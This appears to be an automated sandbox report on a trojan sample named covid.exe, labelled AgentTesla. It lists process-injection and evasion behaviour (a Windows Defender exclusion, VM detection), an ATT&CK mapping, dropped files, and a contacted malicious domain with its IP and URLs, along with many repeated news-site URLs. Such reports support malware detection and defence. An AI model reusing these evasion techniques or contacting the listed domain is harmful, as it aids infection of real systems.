Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
Source: C:\Users\user\Desktop\covid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery23Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsService Execution2Logon Script (Mac)Windows Service1Timestomp1NTDSSecurity Software Discovery121Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptProcess Injection11Masquerading1LSA SecretsVirtualization/Sandbox Evasion141SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion141Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 393947 Sample: covid.exe Startdate: 20/04/2021 Architecture: WINDOWS Score: 68 39 Multi AV Scanner detection for domain / URL 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Machine Learning detection for sample 2->43 7 covid.exe 21 10 2->7         started        process3 dnsIp4 37 mmwrlridbhmibnr.ml 172.67.220.147, 49702, 80 CLOUDFLARENETUS United States 7->37 29 C:\Users\user\AppData\Local\...\covid.exe.log, ASCII 7->29 dropped 31 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, PE32 7->31 dropped 33 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 7->33 dropped 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->45 47 Adds a directory exclusion to Windows Defender 7->47 12 AdvancedRun.exe 1 7->12         started        14 powershell.exe 24 7->14         started        16 powershell.exe 26 7->16         started        18 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 7->18         started        file5 signatures6 process7 process8 20 AdvancedRun.exe 12->20         started        23 conhost.exe 14->23         started        25 conhost.exe 16->25         started        27 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 18->27         started        dnsIp9 35 192.168.2.1 unknown unknown 20->35

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
covid.exe41%VirustotalBrowse
covid.exe9%MetadefenderBrowse
covid.exe34%ReversingLabsWin32.Trojan.AgentTesla
covid.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.0.covid.exe.460000.0.unpack100%AviraHEUR/AGEN.1101074Download File

Domains

SourceDetectionScannerLabelLink
mmwrlridbhmibnr.ml5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mmwrlridbhmibnr.ml
172.67.220.147
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.htmltrue
  • 8%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.htmlfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://c.amazon-adsystem.com/aax2/apstag.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    		high
    https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jpcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
